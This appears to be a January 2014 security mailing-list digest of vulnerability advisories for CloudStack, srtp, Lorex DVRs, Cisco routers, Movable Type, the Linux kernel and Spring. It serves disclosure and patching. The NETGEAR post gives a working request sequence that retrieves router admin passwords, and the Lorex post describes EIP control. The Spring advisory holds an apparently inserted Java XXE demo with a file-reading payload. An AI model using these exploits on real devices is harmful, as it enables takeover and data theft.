Updated [CVE-2014-0031] CloudStack ListNetworkACL API discloses ACLs for other users

2014-01-13 Thread David Nalley
Issued: January 9, 2014
Updated: January 10, 2014

[CVE-2014-0031] CloudStack ListNetworkACL API discloses ACLs for other users


Product: Apache CloudStack
Vendor: Apache Software Foundation
Vulnerability type: Information Disclosure
Vulnerable Versions: Apache CloudStack 4.2.0
CVE References: CVE-2014-0031
Risk Level: Low
CVSSv2 Base Scores: 3.5  (AV:N/AC:M/Au:S/C:P/I:N/A:N)

Description:
The Apache CloudStack Security Team was notified of an
issue in Apache CloudStack which permits an authenticated user to list
network ACLs for other users.

Mitigation:
Upgrading to CloudStack 4.2.1 or higher will mitigate this issue.

References:
https://issues.apache.org/jira/browse/CLOUDSTACK-5145

Credit:
This issue was identified by Marcus Sorensen


Updated [CVE-2013-6398] CloudStack Virtual Router stop/start modifies firewall rules allowing additional access

2014-01-13 Thread David Nalley
Issued: November 27, 2013
Updated: January 10, 2014

[CVE-2013-6398] CloudStack Virtual Router stop/start modifies firewall
rules allowing additional access

Product: Apache CloudStack
Vendor: Apache Software Foundation
Vulnerability type: Bypass
Vulnerable Versions: Apache CloudStack 4.1.0, 4.1.1, 4.2.0
CVE References: CVE-2013-2136
Risk Level: Low
CVSSv2 Base Scores: 2.8 (AV:N/AC:M/Au:M/C:P/I:N/A:N)



Description:
The Apache CloudStack Security Team was notified of an
issue in the Apache CloudStack virtual router that failed to preserve
source restrictions in firewall rules after a virtual router had been
stopped and restarted.

Mitigation:
Upgrading to CloudStack 4.2.1 or higher will mitigate this issue.

References:
https://issues.apache.org/jira/browse/CLOUDSTACK-5263

Credit:
This issue was identified by the Cloud team and Schuberg Philis


[SECURITY] [DSA 2840-1] srtp security update

2014-01-13 Thread Salvatore Bonaccorso
Debian Security Advisory DSA-2840-1   secur...@debian.org
http://www.debian.org/security/  Salvatore Bonaccorso
January 10, 2014   http://www.debian.org/security/faq

Package: srtp
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-2139
Debian Bug : 711163

  Fernando Russ from Groundworks Technologies reported a buffer overflow
  flaw in srtp, Cisco's reference implementation of the Secure Real-time
  Transport Protocol (SRTP), in how the
  crypto_policy_set_from_profile_for_rtp() function applies
  cryptographic profiles to an srtp_policy. A remote attacker could
  exploit this vulnerability to crash an application linked against
  libsrtp, resulting in a denial of service.

For the oldstable distribution (squeeze), this problem has been fixed in
version 1.4.4~dfsg-6+deb6u1.

For the stable distribution (wheezy), this problem has been fixed in
version 1.4.4+20100615~dfsg-2+deb7u1.

For the testing distribution (jessie), this problem has been fixed in
version 1.4.5~20130609~dfsg-1.

For the unstable distribution (sid), this problem has been fixed in
version 1.4.5~20130609~dfsg-1.

We recommend that you upgrade your srtp packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



[CVE-2014-1201] Lorex security DVR ActiveX control buffer overflow

2014-01-13 Thread Pedro Ribeiro
Hi,

I have discovered a buffer overflow vulnerability that allows remote
code execution in an ActiveX control bundled by a manufacturer of
video surveillance systems.

The company is Lorex Technologies, a major video surveillance
manufacturer that is very popular in the US and East Asia. Their
affected product range is the EDGE series, which has 16 products in
it. I have confirmed that all 16 are vulnerable at this point in time.
These security DVRs are remotely accessible, and when you access them
on a Windows computer with Internet Explorer, they try to install the
vulnerable ActiveX control INetViewX. The Lorex manual[1] instructs
the user to blindly accept the ActiveX control install when prompted.
The full list of devices, as well as links to the firmware download,
can be found in [2]. Their products offer remote video viewing
capabilities, and you can find some of them on Shodan[3].

The buffer overflow can be triggered by a really long string (1+
characters) in the HTTP_PORT parameter. The instruction pointer can be
very easily controlled in XP by the characters 109 to 113 in the
string. Please refer to the PoC file lorex-testcase.html. You will see
that the HTTP_PORT parameter is composed of D's, apart from chars 109
to 113 which are four A's. If you open this file in IE after
installing the control, you will see that IE will crash with an EIP of
0x41414141. Changing the four A's to any other value will cause EIP to
crash on that value.

The list below tells a better story about what is affected and how it
can be controlled:
Win XP SP3 with IE6 - Fully exploitable as described
Win XP SP3 with IE8 - Could not get it to crash ()
Win 7 x64 with IE10 fully patched - Fully exploitable, though not as
easy as for XP (see analyze -v [4] and !exploitable [5] outputs)

To verify this vulnerability you can download and extract the firmware
using binwalk (http://code.google.com/p/binwalk/). To do so, please
follow the instructions in [6], and then install the ActiveX control
in INetViewProj1_02030330.cab.

I have contacted Lorex and they initially said they would fix it, but
went radio silent shortly afterwards.
17.11.2013 - Initial contact via support page
18.11.2013 - Email to sales, no response.
21.11.2013 - Second email to sales, received response by sales saying
they will forward it to technical support and get back to me.
04.12.2013 - Third email to sales saying that technical support never
contacted me back. No response.
08.01.2013 - MITRE assigns CVE-2014-1201 to this issue.
09.01.2013 - Public disclosure.

All references and proof of concept can be found under the lorexActivex
folder in the repo at
https://github.com/pedrib/PoC

Regards,
Pedro Ribeiro (ped...@gmail.com)
Agile Information Security


Cisco Security Advisory: Undocumented Test Interface in Cisco Small Business Devices

2014-01-13 Thread Cisco Systems Product Security Incident Response Team

Undocumented Test Interface in Cisco Small Business Devices

Advisory ID: cisco-sa-20140110-sbd

Revision 1.0

For Public Release 2014 January 10 16:00 UTC (GMT)

Summary
===

A vulnerability in the Cisco WAP4410N Wireless-N Access Point, Cisco WRVS4400N 
Wireless-N Gigabit Security Router, and the Cisco RVS4000 4-port Gigabit 
Security Router could allow an unauthenticated, remote attacker to gain 
root-level access to an affected device.

Cisco will release free software updates that address these vulnerabilities. 
Workarounds that mitigate these vulnerabilities are not available. 

This advisory is available at the following link: 
http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140110-sbd


[SECURITY] [DSA 2841-1] movabletype-opensource security update

2014-01-13 Thread Moritz Muehlenhoff
Debian Security Advisory DSA-2841-1   secur...@debian.org
http://www.debian.org/security/   Moritz Muehlenhoff
January 11, 2014   http://www.debian.org/security/faq

Package: movabletype-opensource
Vulnerability  : cross-site scripting
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2014-0977
Debian Bug : 734304

A cross-site scripting vulnerability was discovered in the rich text 
editor of the Movable Type blogging engine.

For the oldstable distribution (squeeze), this problem has been fixed in
version 4.3.8+dfsg-0+squeeze4.

For the stable distribution (wheezy), this problem has been fixed in
version 5.1.4+dfsg-4+deb7u1.

For the unstable distribution (sid), this problem has been fixed in
version 5.2.9+dfsg-1.

We recommend that you upgrade your movabletype-opensource packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org



CISTI'2014: List of Workshops

2014-01-13 Thread ML
WORKSHOPS
CISTI'2014 - 9th Iberian Conference on Information Systems and Technologies
 Barcelona, Spain, June 18 - 21, 2014 
  http://www.aisti.eu/cisti2014/index.php/en/workshops


List of Workshops to be held in the CISTI'2014 context:

- ARWC 2014 - 1st Workshop on Augmented Reality and Wearable Computing

- ASDACS 2014 - 1st Workshop on Applied Statistics and Data Analysis using 
Computer Science

- IoT 2014 - 1st Workshop on Internet of Things

- SGaMePlay 2014 - 4th Iberian Workshop on Serious Games and Meaningful Play

- TICAMES 2014 - 2nd Workshop on Information and Communication Technology in 
Higher Education: Learning Mathematics

- WICTA 2014 - 1st Workshop on ICT for Audit

- WISA 2014 - 6th Workshop on Intelligent Systems and Applications

- WLA 2014 - 1st Workshop on Learning Analytics

- WNIS 2014 - 1st Workshop on Networks, Information and Society

Detailed information about these workshops is available at 
http://www.aisti.eu/cisti2014/index.php/en/workshops

Best regards,

CISTI'2014 Team
http://www.aisti.eu/cisti2014/index.php/en



NETGEAR WNR1000v3 Password Recovery Vulnerability

2014-01-13 Thread c1ph04mail
Description: Newer firmware versions of the NETGEAR N150 WNR1000v3 wireless 
router are affected by a password recovery vulnerability.

Exploiting this vulnerability allows an attacker to recover the router's 
(plaintext) Administrator credentials and subsequently gain full access to the 
device. This vulnerability can be exploited remotely if the remote 
administration access feature is enabled (as well as locally via wired or 
wireless access).

Tested Device Model: Netgear N150 WNR1000v3

Tested Device Firmware Versions: V1.0.2.60_60.0.86, V1.0.2.54_60.0.82NA, and 
V1.0.2.62_60.0.87

Potential Impacts: Gaining full control over a wireless router exposes multiple 
attack vectors including: DoS, DNS control (many ways this can be leveraged to 
exploit clients), access to PPPoE credentials, cleartext WPA/WPA2 PSK (for 
guest and private network), firewall rule and port forwarding manipulation, etc.

Vulnerability Status: The vulnerability was privately disclosed to the vendor in 
June of 2013; however, they have not yet issued a patch.

Other Notes: This vulnerability remains exploitable when the password recovery 
feature of the router is disabled.

Overview:

The password recovery mechanism appears to be designed to work as follows:

1.) After failing to login the user will be redirected to a password recovery 
page that requests the router serial number

2.) If the user enters the serial number correctly, another page will appear 
that requires the user to correctly answer 2 secret questions

3.) If the user answers the secret questions correctly, the router username and 
password is displayed


The problem: The implementation of this password recovery method has 
issues...lots of issues


Vulnerability and Exploit Details:

1.) Access the router login through a web browser: http://192.168.1.1

2.) Select Cancel on the HTTP basic login box (or enter arbitrary 
credentials), the router responds with the following (Note the unauth.cgi?id 
parameter):

--

HTTP/1.0 401 Unauthorized
WWW-Authenticate: Basic realm="NETGEAR WNR1000v3"
Content-type: text/html

<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<title>401 Unauthorized</title></head>
<body onload="document.aForm.submit()"><h1>401 Unauthorized</h1>
<p>Access to this resource is denied, your client has not supplied the correct
authentication.</p><form method="post" action="unauth.cgi?id=78185530"
name="aForm"></form></body>
</html>
--
 
3.) Use the unauth.cgi ID parameter to send the following (crafted) HTTP POST 
request:

--

POST http://192.168.1.1/passwordrecovered.cgi?id=78185530 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 192.168.1.1
Content-Length: 35
Connection: Keep-Alive
Pragma: no-cache

--
The username and (plaintext) password are returned in the response (truncated 
for brevity):
--
..
<tr>
 <td class="MNUText" align="right">Router Admin Username</td>
 <td class="MNUText" align="left">admin</td>
</tr>
<tr>
 <td class="MNUText" align="right">Router Admin Password</td>
 <td class="MNUText" align="left">D0n'tGuessMe!</td>
</tr>
..
--

Additional details and proof-of-concept exploit can be found here: 

http://c1ph04text.blogspot.com/2014/01/mitrm-attacks-your-middle-or-mine.html



[ MDVSA-2014:001 ] kernel

2014-01-13 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2014:001
 http://www.mandriva.com/en/support/security/
 ___

 Package : kernel
 Date: January 13, 2014
 Affected: Business Server 1.0
 ___

 Problem Description:

 Multiple vulnerabilities have been found and corrected in the Linux
 kernel:
 
 The KVM subsystem in the Linux kernel through 3.12.5 allows local
 users to gain privileges or cause a denial of service (system crash)
 via a VAPIC synchronization operation involving a page-end address
 (CVE-2013-6368).
 
 The apic_get_tmcct function in arch/x86/kvm/lapic.c in the KVM
 subsystem in the Linux kernel through 3.12.5 allows guest OS users
 to cause a denial of service (divide-by-zero error and host OS crash)
 via crafted modifications of the TMICT value (CVE-2013-6367).
 
 Multiple buffer underflows in the XFS implementation in the
 Linux kernel through 3.12.1 allow local users to cause a denial
 of service (memory corruption) or possibly have unspecified
 other impact by leveraging the CAP_SYS_ADMIN capability for a (1)
 XFS_IOC_ATTRLIST_BY_HANDLE or (2) XFS_IOC_ATTRLIST_BY_HANDLE_32 ioctl
 call with a crafted length value, related to the xfs_attrlist_by_handle
 function in fs/xfs/xfs_ioctl.c and the xfs_compat_attrlist_by_handle
 function in fs/xfs/xfs_ioctl32.c (CVE-2013-6382).
 
 Array index error in the kvm_vm_ioctl_create_vcpu function in
 virt/kvm/kvm_main.c in the KVM subsystem in the Linux kernel through
 3.12.5 allows local users to gain privileges via a large id value
 (CVE-2013-4587).
 
 The mISDN_sock_recvmsg function in drivers/isdn/mISDN/socket.c in
 the Linux kernel before 3.12.4 does not ensure that a certain length
 value is consistent with the size of an associated data structure,
 which allows local users to obtain sensitive information from kernel
 memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call
 (CVE-2013-7266).
 
 The atalk_recvmsg function in net/appletalk/ddp.c in the Linux kernel
 before 3.12.4 updates a certain length value without ensuring that an
 associated data structure has been initialized, which allows local
 users to obtain sensitive information from kernel memory via a (1)
 recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7267).
 
 The ipx_recvmsg function in net/ipx/af_ipx.c in the Linux kernel
 before 3.12.4 updates a certain length value without ensuring that an
 associated data structure has been initialized, which allows local
 users to obtain sensitive information from kernel memory via a (1)
 recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7268).
 
 The nr_recvmsg function in net/netrom/af_netrom.c in the Linux kernel
 before 3.12.4 updates a certain length value without ensuring that an
 associated data structure has been initialized, which allows local
 users to obtain sensitive information from kernel memory via a (1)
 recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7269).
 
 The packet_recvmsg function in net/packet/af_packet.c in the Linux
 kernel before 3.12.4 updates a certain length value before ensuring
 that an associated data structure has been initialized, which allows
 local users to obtain sensitive information from kernel memory via a
 (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7270).
 
 The x25_recvmsg function in net/x25/af_x25.c in the Linux kernel
 before 3.12.4 updates a certain length value without ensuring that an
 associated data structure has been initialized, which allows local
 users to obtain sensitive information from kernel memory via a (1)
 recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7271).
 
 The Linux kernel before 3.12.4 updates certain length values before
 ensuring that associated data structures have been initialized,
 which allows local users to obtain sensitive information from kernel
 stack memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system
 call, related to net/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c,
 net/ipv6/raw.c, and net/ipv6/udp.c (CVE-2013-7263).
 
 The l2tp_ip_recvmsg function in net/l2tp/l2tp_ip.c in the Linux kernel
 before 3.12.4 updates a certain length value before ensuring that an
 associated data structure has been initialized, which allows local
 users to obtain sensitive information from kernel stack memory via a
 (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call (CVE-2013-7264).
 
 The pn_recvmsg function in net/phonet/datagram.c in the Linux kernel
 before 3.12.4 updates a certain length value before ensuring that an
 associated data structure has been initialized, which allows local
 users to obtain sensitive information from kernel stack memory via a
 (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call 

[SECURITY] [DSA 2842-1] libspring-java security update

2014-01-13 Thread Moritz Muehlenhoff
Debian Security Advisory DSA-2842-1   secur...@debian.org
http://www.debian.org/security/   Markus Koschany
January 13, 2014   http://www.debian.org/security/faq

Package: libspring-java
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2013-4152
Debian Bug : 720902

Alvaro Munoz discovered an XML External Entity (XXE) injection in the 
Spring Framework which can be used for conducting CSRF and DoS attacks 
on other sites.

The Spring OXM wrapper did not expose any property for disabling entity
resolution when using the JAXB unmarshaller. There are four possible 
source implementations passed to the unmarshaller:

DOMSource
StAXSource
SAXSource
StreamSource

For a DOMSource, the XML has already been parsed by user code
and that code is responsible for protecting against XXE.

For a StAXSource, the XMLStreamReader has already been created
by user code and that code is responsible for protecting
against XXE.

For SAXSource and StreamSource instances, Spring processed
external entities by default thereby creating this
vulnerability.

The issue was resolved by disabling external entity processing
by default and adding an option to enable it for those users
that need to use this feature when processing XML from a
trusted source.

It was also identified that Spring MVC processed user provided
XML with JAXB in combination with a StAX XMLInputFactory
without disabling external entity resolution. External entity
resolution has been disabled in this case.
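Plain JAXB shows the distinction the advisory draws: a StreamSource is handed to the default parser with external entities resolved (the pre-fix behaviour for SAXSource and StreamSource), while wrapping the input in a SAXSource whose XMLReader has entity resolution switched off is the kind of default the fix introduces. This is an added example, not Spring's, Debian's or Alvaro Munoz's code; it assumes a JAXB implementation on the classpath (Java 8, or jaxb-api plus a runtime on newer JDKs) and uses a constructed payload that points at a benign local file.

```java
import java.io.StringReader;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.Unmarshaller;
import javax.xml.bind.annotation.XmlRootElement;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.transform.Source;
import javax.xml.transform.sax.SAXSource;
import javax.xml.transform.stream.StreamSource;
import org.xml.sax.InputSource;
import org.xml.sax.XMLReader;

public class XxeUnmarshalDemo {

    // Constructed target type for the unmarshaller (public field is mapped by JAXB).
    @XmlRootElement(name = "note")
    public static class Note {
        public String body;
    }

    // Constructed payload: a DOCTYPE declaring an external entity that points at a
    // harmless local file. Any file the JVM can read would be pulled in the same way.
    static final String PAYLOAD =
          "<?xml version=\"1.0\"?>\n"
        + "<!DOCTYPE note [<!ENTITY ext SYSTEM \"file:///etc/hostname\">]>\n"
        + "<note><body>&ext;</body></note>";

    // Unsafe: a StreamSource lets the JAXB default parser resolve &ext;,
    // so 'body' ends up holding the contents of /etc/hostname.
    static String unmarshalUnsafe() throws Exception {
        Unmarshaller u = JAXBContext.newInstance(Note.class).createUnmarshaller();
        Note n = (Note) u.unmarshal(new StreamSource(new StringReader(PAYLOAD)));
        return n.body;
    }

    // Hardened: build the XMLReader ourselves with external entity resolution
    // and external DTD loading disabled, then pass it inside a SAXSource.
    // The entity is skipped, so 'body' comes back empty instead of the file contents.
    // (Setting "http://apache.org/xml/features/disallow-doctype-decl" to true is the
    // stricter option: the DOCTYPE itself is then rejected with a parse error.)
    static String unmarshalHardened() throws Exception {
        SAXParserFactory spf = SAXParserFactory.newInstance();
        spf.setNamespaceAware(true); // JAXB expects a namespace-aware reader
        spf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        spf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        spf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        XMLReader reader = spf.newSAXParser().getXMLReader();
        Source src = new SAXSource(reader, new InputSource(new StringReader(PAYLOAD)));
        Unmarshaller u = JAXBContext.newInstance(Note.class).createUnmarshaller();
        Note n = (Note) u.unmarshal(src);
        return n.body;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("unsafe   : " + unmarshalUnsafe());
        System.out.println("hardened : " + unmarshalHardened());
    }
}
```

A DOMSource or StAXSource passed to the same unmarshaller would already be parsed, which is why the advisory places the responsibility for those two on the calling code.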

For the stable distribution (wheezy), this problem has been fixed in
version 3.0.6.RELEASE-6+deb7u1.

For the unstable distribution (sid), this problem has been fixed in
version 3.0.6.RELEASE-10.

We recommend that you upgrade your libspring-java packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org